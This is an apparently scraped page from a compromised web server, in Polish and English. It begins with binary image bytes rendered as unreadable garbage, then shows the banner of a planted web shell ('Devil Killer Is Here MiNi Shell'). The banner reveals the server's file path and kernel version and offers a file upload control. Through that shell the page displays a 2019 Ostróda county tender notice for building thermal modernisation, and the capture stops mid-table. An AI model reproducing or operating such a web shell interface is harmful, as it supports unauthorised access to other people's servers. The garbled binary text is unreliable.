JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20190320/527027-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 527027-N-2019 z dnia 2019-03-20 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Powiat Ostródzki z siedzibą w Ostródzie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Termomodernizacja budynku użyteczności publicznej przy ul. Kościuszki 2 w Ostródzie</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Inwestycja jest realizowana z udziałem środków finansowych Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Warmińsko-Mazurskiego na lata 2014-2020 Oś priorytetowa : Efektywność energetyczna; Działanie: 4.3 Kompleksowa modernizacja energetyczna budynków; Poddziałanie: 4.3.1 Efektywność energetyczna w budynkach publicznych.</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Powiat Ostródzki z siedzibą w Ostródzie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">00000000000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Jana III Sobieskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">5</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">14-100</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Ostróda</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">warmińsko-mazurskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">896 429 800</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">sekretariat@powiat.ostroda.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">896 429 817</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://bip.powiat.ostroda.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://bip.powiat.ostroda.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://bip.powiat.ostroda.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">W formie pisemnej.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Powiat Ostródzki, 14-100 Ostróda, ul. Jana III Sobieskiego 5, pok. 218 (sekretariat)</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Termomodernizacja budynku użyteczności publicznej przy ul. Kościuszki 2 w Ostródzie</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.272.RL.4.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest realizacja zadania pn. Termomodernizacja budynku użytecznościpublicznej przy ul. Kościuszki 2 w Ostródzie, zgodnie z przedmiarem robót (zał. nr 4a i 4b do siwz);dokumentacją projektową (zał. nr 5 do siwz); specyfikacją techniczną wykonania i odbioru robót(STWiOR) - zał. nr 6 do siwz; audytem energetycznym (zał. nr 7 do siwz); decyzją RDOŚ (zał. nr 8 dosiwz); opinią ornitologiczną (zał. nr 9 do siwz) oraz projektem umowy (zał. nr 3 do siwz). 2. Przedmiotzamówienia w szczególności obejmuje: 1) Przedmiot zamówienia obejmuje wykonanie wszystkich robótbudowlanych objętych przedmiotem zamówienia, w tym: a) docieplenie ścian podziemia - ok. 26,46 m2;b) ocieplenie ścian zewnętrznych budynku (elewacja) - ok. 2.171,00 m2; c) wymiana pokryciadachowego wraz z wymiana orynnowania i obróbek blacharskich - ok. 1.193,70 m2; d) wymianapodokienników zewnętrznych (demontaż podokienników stalowych - ok. 450,50 mb; montażpodokienników z blachy powlekanej - ok. 198,22 m2); e) wykonanie opaski z kostki wokół budynku -ok. 71,02 m2; f) instalacja odgromowa - ok. 588,50 mb; g) wymiana instalacji c.o., w tym demontażistniejących grzejników - 224 kpl.; montaż nowych grzejników - 259 szt. 2) Przedmiot zamówieniaobejmuje ponadto wykonanie wszelkich prac pomocniczych i towarzyszących niezbędnych doprawidłowej realizacji przedmiotu zamówienia, w tym: a) dokonanie przeglądu istniejących zabezpieczeńptasich gniazd na obiekcie oraz ewentualne ich uzupełnienie bądź naprawę; b) zamontowanie budeklęgowych dla chronionego ptactwa pod nadzorem ornitologicznym wskazanym przez Zamawiającego.Budki dostarcza osoba wskazana przez Zamawiającego do nadzoru ornitologicznego; c) zabezpieczenieterenu, na którym prowadzone będą roboty oraz pomieszczeń, w których prowadzone będą roboty (terenbudowy); d) uporządkowanie i uprzątnięcie po zakończeniu robót terenu, na którym prowadzone będąroboty, w tym sąsiednich posesji zanieczyszczonych w wyniku prowadzonych robót oraz pomieszczeń, wktórych prowadzone były roboty, w tym sąsiednich pomieszczeń zanieczyszczonych w wynikuprowadzonych robót; e) przeprowadzenie prób, rozruchu technologicznego oraz wymaganych badań, atakże przygotowanie dokumentów niezbędnych do przekazania do użytkowania obiektu powstałego wwyniku przeprowadzonych robót budowlanych; f) przygotowanie i przekazanie Zamawiającemukompletnej dokumentacji powykonawczej wraz z instrukcjami obsługi wszystkich zamontowanych wbudynku urządzeń i wyposażenia. 3. Wymagania dotyczące zatrudnienia na podstawie umowy o pracę: 1)Na podstawie art. 29 ust. 3a ustawy Pzp, w związku z art. 36 ust. 2 pkt 8a ustawy Pzp, Zamawiającywymaga, aby pracownicy fizyczni bezpośrednio wykonujący prace fizyczne w zakresie realizacjizamówienia, polegające na bezpośrednim fizycznym wykonywaniu robót budowlanych, zatrudnieni byliprzez Wykonawcę lub podwykonawcę na podstawie umowy o pracę w rozumieniu art. 22 § 1 ustawy zdnia 26 czerwca 1974 r. Kodeks pracy (Dz. U. z 2018 r., poz. 917 z późn. zm.). 2) W trakcie realizacjiprzedmiotu zamówienia, każdorazowo na żądanie Zamawiającego i w terminie wskazanym przezZamawiającego, Wykonawca zobowiązany będzie do przedłożenia niżej wymienionych dowodów w celupotwierdzenia spełniania wymogu zatrudnienia na podstawie umowy o pracę przez Wykonawcę lubpodwykonawcę osób, o których mowa w ust. 1, tj.: a) oświadczenia Wykonawcy i podwykonawcy (jeślidotyczy) o zatrudnieniu na podstawie umowy o pracę osób wykonujących czynności, których dotyczywezwanie Zamawiającego. Oświadczenie to powinno zawierać w szczególności: dokładne określeniepodmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniemczynności wykonują osoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tychosób, imion i nazwisk tych osób, rodzaju umowy o pracę, okresu na jaki umowa o pracę została zawarta iwymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu Wykonawcy lubpodwykonawcy; b) zaświadczenie właściwego oddziału ZUS, potwierdzające opłacanie przezWykonawcę lub podwykonawcę składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia napodstawie umów o pracę za ostatni okres rozliczeniowy; 3) Nieprzedłożenie przez Wykonawcę lubpodwykonawcę, w terminie wskazanym przez Zamawiającego zgodnie z pkt 2, oświadczenia i/lubdokumentów, o których mowa w pkt 2 lit. a i b, będzie traktowane jako niewypełnienie obowiązkuzatrudnienia na podstawie umowy o pracę pracowników fizycznych bezpośrednio wykonujących pracefizyczne w zakresie realizacji zamówienia, polegające na bezpośrednim fizycznym wykonywaniu robótbudowlanych. 4) Za każdorazowe nieudokumentowanie przez Wykonawcę, na wezwanie Zamawiającego,o którym mowa w pkt 2, że prace fizyczne polegające na bezpośrednim wykonywaniu robótbudowlanych, są wykonywane przez pracowników fizycznych zatrudnionych przez Wykonawcę lubpodwykonawcę na podstawie umowy o pracę w rozumieniu przepisów Kodeksu Pracy - Wykonawcazapłaci Zamawiającemu karę umowną w wysokości 1.000,00 zł. 5) W przypadku uzasadnionychwątpliwości co do przestrzegania prawa pracy przez Wykonawcę lub podwykonawcę, Zamawiający możezwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy. 4. Wymagania dotyczącezatrudnienia osób bezrobotnych i/lub niepełnosprawnych: 1) Na podstawie art. 29 ust. 4 ustawy PzpZamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę do realizacji przedmiotuzamówienia co najmniej jednej osoby bezrobotnej lub niepełnosprawnej . 2) Zatrudnienie co najmniejjednej osoby bezrobotnej lub niepełnosprawnej, o której mowa w pkt 1, winno nastąpić nie później niż wterminie 20 dni roboczych po podpisaniu umowy i powinno trwać do końca realizacji przedmiotuzamówienia. 3) Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, będzie miał obowiązekprzedstawienia dowodów, że zgodnie z postanowieniem pkt 1 i 2, do realizacji przedmiotu zamówieniazatrudniono co najmniej jedną osobę bezrobotną lub niepełnosprawną. Dowody, o których mowa wzdaniu pierwszym Wykonawca dostarczy Zamawiającemu nie później niż w terminie 21 dni roboczych popodpisaniu umowy oraz raz na kwartał będzie dokonywał aktualizacji tych informacji w postacipisemnego oświadczenia dostarczanego do siedziby Zamawiającego - nie później niż do 10 dnia miesiącarozpoczynającego dany kwartał. 4) Dowody, o których mowa w pkt 3, stanowią: a) oświadczenieWykonawcy lub podwykonawcy zawierające: dokładne określenie podmiotu składającego oświadczenie,datę złożenia oświadczenia, informację o zatrudnieniu do realizacji przedmiotu zamówienia co najmniejjednej osoby bezrobotnej lub niepełnosprawnej, o której mowa w pkt 1 oraz podpis osoby uprawnionej dozłożenia oświadczenia odpowiednio w imieniu Wykonawcy lub podwykonawcy; b) w przypadkuzatrudnienia osoby bezrobotnej - poświadczona odpowiednio za zgodność z oryginałem przezWykonawcę lub podwykonawcę zanonimizowana kserokopia aktualnej umowy o pracę lub umowycywilnoprawnej, zawartej z osobą bezrobotną, z zastrzeżeniem postanowienia § 3 ust. 4 pkt 1 siwz. Kopiaumowy powinna być zanonimizowana w sposób zapewniający ochronę danych osobowych zatrudnionejosoby, zgodnie z przepisami rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i wsprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólnerozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1) - dalej RODO, (tj. wszczególności bez adresu, nr PESEL zatrudnionej osoby, itp. danych identyfikujących daną osobę). Imię inazwisko zatrudnionej osoby nie podlega anonimizacji. Informacje takie jak: data zawarcia umowy,rodzaj zawartej umowy i wymiar etatu powinny być możliwe do zidentyfikowania; c) w przypadkuzatrudnienia osoby bezrobotnej - poświadczona odpowiednio za zgodność z oryginałem przezWykonawcę lub podwykonawcę zanonimizowana kopia lub zanonimizowany odpis skierowania osobybezrobotnej przez Powiatowy Urząd Pracy do Wykonawcy lub podwykonawcy lub właściwegodokumentu kierującego bezrobotnego do pracy wystawionego przez organ zajmujący się realizacją zadańz zakresu rynku pracy określony w analogicznych przepisach państwa członkowskiego Unii Europejskiejlub Europejskiego Obszaru Gospodarczego. 5) W przypadku wygaśnięcia lub rozwiązania umowy opracę z osobą bezrobotną lub niepełnosprawną, Wykonawca zobowiązany będzie do bezzwłocznegozatrudnienia kolejnej osoby posiadającej status osoby bezrobotnej lub niepełnosprawnej. 6) Za brakprzedstawienia dokumentów w terminach, o których mowa w pkt 3, będących dowodem zatrudnienia conajmniej jednej osoby bezrobotnej lub niepełnosprawnej na okres, o którym mowa w pkt 2, Wykonawcazapłaci Zamawiającemu karę umowną w wysokości 1.000,00 zł. 7) Wykonawca zwolniony będzie zzapłacenia kary umownej, o której mowa w pkt 6, jeżeli wykaże, że przedstawił zgłoszenie ofert pracyPowiatowemu Urzędowi Pracy, albo odpowiedniemu organowi zajmującemu się realizacją zadań zzakresu rynku pracy w państwie, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, aniezatrudnienie co najmniej jednej osoby bezrobotnej lub niepełnosprawnej, nastąpiło z przyczynnieleżących po jego stronie. Za przyczynę nieleżącą po stronie Wykonawcy, będzie uznany wszczególności brak takich osób zdolnych do wykonania zamówienia na obszarze, na którym jestrealizowane zamówienie i w okresie jego realizacji lub odmowa podjęcia pracy kolejno przez co najmniejtrzy osoby posiadające status osoby bezrobotnej. 5. Inne postanowienia: 1) Z uwagi na fakt, iż robotybędą prowadzone w obiekcie czynnym, wszelkie prace należy wykonywać w sposób niestwarzającyzagrożenia dla osób przebywających w obiekcie. Sposób prowadzenia prac nie może wpływać nafunkcjonowanie obiektu. W trakcie prowadzenia robót wykonawca zobowiązany będzie do zachowaniaestetyki i czystości. 2) Materiały pochodzące z demontażu urządzeń istniejących oraz gruz Wykonawcazobowiązany jest poddać utylizacji w ramach wynagrodzenia wynikającego ze złożonej oferty. Kosztzaładunku, rozładunku oraz przewozu urządzeń i gruzu do miejsca ich utylizacji mieści się wwynagrodzeniu wynikającym ze złożonej oferty. 3) Zamawiający wymaga aby Wykonawca, na wykonanyprzedmiot zamówienia udzielił gwarancji w okresie minimum 24 miesięcy. 4) Jeżeli w opisie przedmiotuzamówienia znajdują się jakiekolwiek znaki towarowe, patent lub pochodzenie źródła lub szczególnyproces, który charakteryzuje produkty lub usługi dostarczane przez konkretnego wykonawcę - należyprzyjąć, że Zamawiający podał opis ze wskazaniem na typ i dopuszcza składanie ofert równoważnych oparametrach techniczno - eksploatacyjno - użytkowych nie gorszych niż te, które zostały podane w opisieprzedmiotu zamówienia. Podstawa prawna: art. 29 ust. 3 ustawy Pzp.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45443000-4</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45321000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45261210-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45320000-6</TD></TR><TR><TD style='border: 1px solid 